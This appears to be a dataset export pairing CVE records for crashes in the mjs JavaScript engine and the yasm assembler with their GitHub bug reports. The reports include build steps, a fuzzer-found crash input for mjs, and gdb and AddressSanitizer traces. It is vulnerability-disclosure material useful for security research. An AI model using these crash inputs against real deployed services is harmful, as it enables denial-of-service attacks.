cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
1.07k
cve_metrics
dict
cve_references
listlengths
1
71
cve_configurations
listlengths
1
10
cve_tags
listlengths
1
4
issue_owner_repo
listlengths
2
2
type
stringclasses
1 value
issue_body
stringlengths
3
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
57
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
38
62
issue_github_id
int64
128M
2.29B
issue_number
int64
3
125k
issue_embedding
listlengths
3.07k
3.07k
__index_level_0__
int64
0
1.14k
msg
stringlengths
175
88.8k
n_tokens
int64
175
88.8k
CVE-2023-49553
2024-01-02T23:15:12.333
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the msj.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/cesanta/mjs/issues/253" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "Exploit", "Vendor Advisory" ]
[ "cesanta", "mjs" ]
Issue
**The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file. **Vulnerability Type** Segmentation fault on program counter **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** ```` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac clang -ggdb -O0 -DMJS_MAIN mjs.c -o mjs -ldl ```` <details> <summary>poc</summary> ```` let i, a = 0, b0= 0, c = 0continu, d0, e = 0; for (i = 8; i < 20; i++) { a let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify+=888 i; c /= 0, c = 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}'; let o = JSON.parse(s); let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify(o)AAA ```` </details> run command ```` mjs -f poc ```` **gdb info** ```` Program terminated with signal SIGSEGV, Segmentation fault. #0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563 7563 mbuf_free(&mjs->json_visited_stack); (gdb) bt #0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563 #1 0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260, path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n a let z = JSON.parse('\"\"'); // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, " true,"..., generate_jsc=0, res=0x7ffd20341a58) at mjs.c:9044 #2 0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260, path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", res=0x7ffd20341aa0) at mjs.c:9067 #3 0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406 (gdb) list 7558 mbuf_free(&mjs->owned_strings); 7559 mbuf_free(&mjs->foreign_strings); 7560 mbuf_free(&mjs->owned_values); 7561 mbuf_free(&mjs->scopes); 7562 mbuf_free(&mjs->loop_addresses); 7563 mbuf_free(&mjs->json_visited_stack); 7564 free(mjs->error_msg); 7565 free(mjs->stack_trace); 7566 mjs_ffi_args_free_list(mjs); 7567 gc_arena_destroy(mjs, &mjs->object_arena); ````
SegFaultOnPc in mjs_destroy() at mjs.c:7563
https://api.github.com/repos/cesanta/mjs/issues/253/comments
0
2023-11-19T09:05:58Z
2023-12-22T02:22:19Z
https://github.com/cesanta/mjs/issues/253
2,000,763,687
253
[ -0.015559551306068897, -0.00648195156827569, -0.0017845084657892585, 0.024407701566815376, 0.02548324689269066, 0.019675303250551224, -0.007629199419170618, 0.03711347281932831, -0.01621921919286251, 0.028595156967639923, -0.027333185076713562, 0.002549041761085391, -0.0014806670369580388, ...
1,100
This is a GitHub Issue repo:mjs owner:cesanta Title : SegFaultOnPc in mjs_destroy() at mjs.c:7563 Issue date: --- start body --- **The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file. **Vulnerability Type** Segmentation fault on program counter **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** ```` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac clang -ggdb -O0 -DMJS_MAIN mjs.c -o mjs -ldl ```` <details> <summary>poc</summary> ```` let i, a = 0, b0= 0, c = 0continu, d0, e = 0; for (i = 8; i < 20; i++) { a let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify+=888 i; c /= 0, c = 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}'; let o = JSON.parse(s); let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify(o)AAA ```` </details> run command ```` mjs -f poc ```` **gdb info** ```` Program terminated with signal SIGSEGV, Segmentation fault. #0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563 7563 mbuf_free(&mjs->json_visited_stack); (gdb) bt #0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563 #1 0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260, path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n a let z = JSON.parse('\"\"'); // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, " true,"..., generate_jsc=0, res=0x7ffd20341a58) at mjs.c:9044 #2 0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260, path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", res=0x7ffd20341aa0) at mjs.c:9067 #3 0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406 (gdb) list 7558 mbuf_free(&mjs->owned_strings); 7559 mbuf_free(&mjs->foreign_strings); 7560 mbuf_free(&mjs->owned_values); 7561 mbuf_free(&mjs->scopes); 7562 mbuf_free(&mjs->loop_addresses); 7563 mbuf_free(&mjs->json_visited_stack); 7564 free(mjs->error_msg); 7565 free(mjs->stack_trace); 7566 mjs_ffi_args_free_list(mjs); 7567 gc_arena_destroy(mjs, &mjs->object_arena); ```` --- end body --- comments : --- start comments --- --- end comments ---
3,112
CVE-2023-49554
2024-01-03T00:15:08.987
Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/yasm/yasm/issues/249" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.86.g9def:*:*:*:*:*:*:*", "matchCriteriaId": "C9D63BD2-36F6-440B-AC78-6F48EDDC12CD", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
[ "yasm", "yasm" ]
Issue
**The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component. **Vulnerability Type** Use After Free **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13415757/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN info** ```` yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==4513==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000011f0 at pc 0x00000056e946 bp 0x7fff5a439c10 sp 0x7fff5a439c08 READ of size 4 at 0x60e0000011f0 thread T0 #0 0x56e945 in do_directive /yasm/modules/preprocs/nasm/nasm-pp.c:2389:38 #1 0x5685dc in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5084:13 #2 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #3 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #4 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #5 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #6 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #7 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #8 0x7f7cd4d0dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) 0x60e0000011f0 is located 48 bytes inside of 160-byte region [0x60e0000011c0,0x60e000001260) freed by thread T0 here: #0 0x496622 in free (/yasm/yasm+0x496622) #1 0x515814 in def_xfree /yasm/libyasm/xmalloc.c:113:5 #2 0x56a089 in free_mmacro /yasm/modules/preprocs/nasm/nasm-pp.c:1163:5 #3 0x567bc7 in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5010:25 #4 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #5 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #6 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #7 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #8 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #9 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #10 0x7f7cd4d0dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x49688d in malloc (/yasm/yasm+0x49688d) #1 0x5156c7 in def_xmalloc /yasm/libyasm/xmalloc.c:69:14 #2 0x57649d in do_directive /yasm/modules/preprocs/nasm/nasm-pp.c:3212:24 #3 0x5685dc in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5084:13 #4 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #5 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #6 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #7 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #8 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #9 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #10 0x7f7cd4d0dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free /yasm/modules/preprocs/nasm/nasm-pp.c:2389:38 in do_directive Shadow bytes around the buggy address: 0x0c1c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff81f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c1c7fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff8210: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff8220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1c7fff8230: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd 0x0c1c7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1c7fff8250: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff8260: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c1c7fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff8280: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4513==ABORTING ````
heap-use-after-free in the function do_directive() at modules/preprocs/nasm/nasm-pp.c:2389
https://api.github.com/repos/yasm/yasm/issues/249/comments
0
2023-11-20T14:16:57Z
2024-01-03T11:22:46Z
https://github.com/yasm/yasm/issues/249
2,002,305,193
249
[ -0.04197276011109352, 0.023172760382294655, -0.005476740188896656, -0.0013377198483794928, 0.05592532083392143, 0.020655546337366104, 0.007159678265452385, 0.039757609367370605, 0.0039052790962159634, 0.02901269868016243, -0.025215299800038338, 0.007860902696847916, 0.021187756210565567, -...
1,101
This is a GitHub Issue repo:yasm owner:yasm Title : heap-use-after-free in the function do_directive() at modules/preprocs/nasm/nasm-pp.c:2389 Issue date: --- start body --- **The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component. **Vulnerability Type** Use After Free **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13415757/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN info** ```` yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==4513==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000011f0 at pc 0x00000056e946 bp 0x7fff5a439c10 sp 0x7fff5a439c08 READ of size 4 at 0x60e0000011f0 thread T0 #0 0x56e945 in do_directive /yasm/modules/preprocs/nasm/nasm-pp.c:2389:38 #1 0x5685dc in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5084:13 #2 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #3 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #4 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #5 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #6 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #7 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #8 0x7f7cd4d0dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) 0x60e0000011f0 is located 48 bytes inside of 160-byte region [0x60e0000011c0,0x60e000001260) freed by thread T0 here: #0 0x496622 in free (/yasm/yasm+0x496622) #1 0x515814 in def_xfree /yasm/libyasm/xmalloc.c:113:5 #2 0x56a089 in free_mmacro /yasm/modules/preprocs/nasm/nasm-pp.c:1163:5 #3 0x567bc7 in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5010:25 #4 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #5 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #6 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #7 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #8 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #9 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #10 0x7f7cd4d0dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x49688d in malloc (/yasm/yasm+0x49688d) #1 0x5156c7 in def_xmalloc /yasm/libyasm/xmalloc.c:69:14 #2 0x57649d in do_directive /yasm/modules/preprocs/nasm/nasm-pp.c:3212:24 #3 0x5685dc in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5084:13 #4 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #5 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #6 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #7 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #8 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #9 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #10 0x7f7cd4d0dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free /yasm/modules/preprocs/nasm/nasm-pp.c:2389:38 in do_directive Shadow bytes around the buggy address: 0x0c1c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff81f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c1c7fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff8210: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff8220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1c7fff8230: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd 0x0c1c7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1c7fff8250: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff8260: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c1c7fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff8280: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4513==ABORTING ```` --- end body --- comments : --- start comments --- --- end comments ---
6,008
CVE-2023-49555
2024-01-03T00:15:09.047
An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/yasm/yasm/issues/248" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.86.g9def:*:*:*:*:*:*:*", "matchCriteriaId": "C9D63BD2-36F6-440B-AC78-6F48EDDC12CD", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
[ "yasm", "yasm" ]
Issue
**The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component. **Vulnerability Type** segmentation violation **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13415602/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN info** ```` yasm: file name already has no extension: output will be in `yasm.out' AddressSanitizer:DEADLYSIGNAL ================================================================= ==4495==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x00000057e43b bp 0x7ffd326b7640 sp 0x7ffd326b6e40 T0) ==4495==The signal is caused by a READ memory access. ==4495==Hint: address points to the zero page. #0 0x57e43b in expand_smacro /yasm/modules/preprocs/nasm/nasm-pp.c:4357:63 #1 0x5689f0 in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5128:21 #2 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #3 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #4 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #5 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #6 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #7 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #8 0x7f229c330c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /yasm/modules/preprocs/nasm/nasm-pp.c:4357:63 in expand_smacro ==4495==ABORTING ````
SEGV in the function expand_smacro() at modules/preprocs/nasm/nasm-pp.c:4357
https://api.github.com/repos/yasm/yasm/issues/248/comments
2
2023-11-20T14:03:30Z
2024-01-04T10:06:59Z
https://github.com/yasm/yasm/issues/248
2,002,278,782
248
[ -0.01620679721236229, 0.039411984384059906, -0.00479191355407238, 0.01459178514778614, 0.06131383031606674, 0.02295018546283245, -0.007713812403380871, 0.044285356998443604, -0.026746883988380432, 0.030855249613523483, -0.04731705039739609, 0.015087622217833996, 0.02831939607858658, 0.0155...
1,102
This is a GitHub Issue repo:yasm owner:yasm Title : SEGV in the function expand_smacro() at modules/preprocs/nasm/nasm-pp.c:4357 Issue date: --- start body --- **The name of an affected Product** [yasm](https://github.com/yasm/yasm) **The affected version** Commit: [9defefa](https://github.com/yasm/yasm/commit/9defefae9fbcb6958cddbfa778c1ea8605da8b8b) yasm 1.3.0.86.g9def **Description** An issue in yasm 1.3.0.86.g9def allows a attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component. **Vulnerability Type** segmentation violation **Environment** - Operating System ```` Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ```` - Compiler ```` Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11 Target: x86_64-pc-linux-gnu Thread model: posix ```` **Steps to Reproduce** download [poc.zip](https://github.com/yasm/yasm/files/13415602/poc.zip), then ```` git clone https://github.com/yasm/yasm cd yasm git checkout 9defefa ./autogen.sh make distclean CC=clang \ CXX=clang++ \ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" \ ./configure make -j $(nproc) unzip poc.zip # run command ./yasm poc ```` **ASAN info** ```` yasm: file name already has no extension: output will be in `yasm.out' AddressSanitizer:DEADLYSIGNAL ================================================================= ==4495==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x00000057e43b bp 0x7ffd326b7640 sp 0x7ffd326b6e40 T0) ==4495==The signal is caused by a READ memory access. ==4495==Hint: address points to the zero page. #0 0x57e43b in expand_smacro /yasm/modules/preprocs/nasm/nasm-pp.c:4357:63 #1 0x5689f0 in pp_getline /yasm/modules/preprocs/nasm/nasm-pp.c:5128:21 #2 0x56151b in nasm_preproc_get_line /yasm/modules/preprocs/nasm/nasm-preproc.c:203:12 #3 0x551395 in nasm_parser_parse /yasm/modules/parsers/nasm/nasm-parse.c:219:13 #4 0x550fdf in nasm_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:66:5 #5 0x550985 in nasm_parser_do_parse /yasm/modules/parsers/nasm/nasm-parser.c:83:5 #6 0x4ca7d6 in do_assemble /yasm/frontends/yasm/yasm.c:641:5 #7 0x4c832e in main /yasm/frontends/yasm/yasm.c:877:12 #8 0x7f229c330c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /yasm/modules/preprocs/nasm/nasm-pp.c:4357:63 in expand_smacro ==4495==ABORTING ```` --- end body --- comments : --- start comments --- --- end comments ---
2,833
CVE-2023-49556
2024-01-03T00:15:09.090
Buffer Overflow vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component.
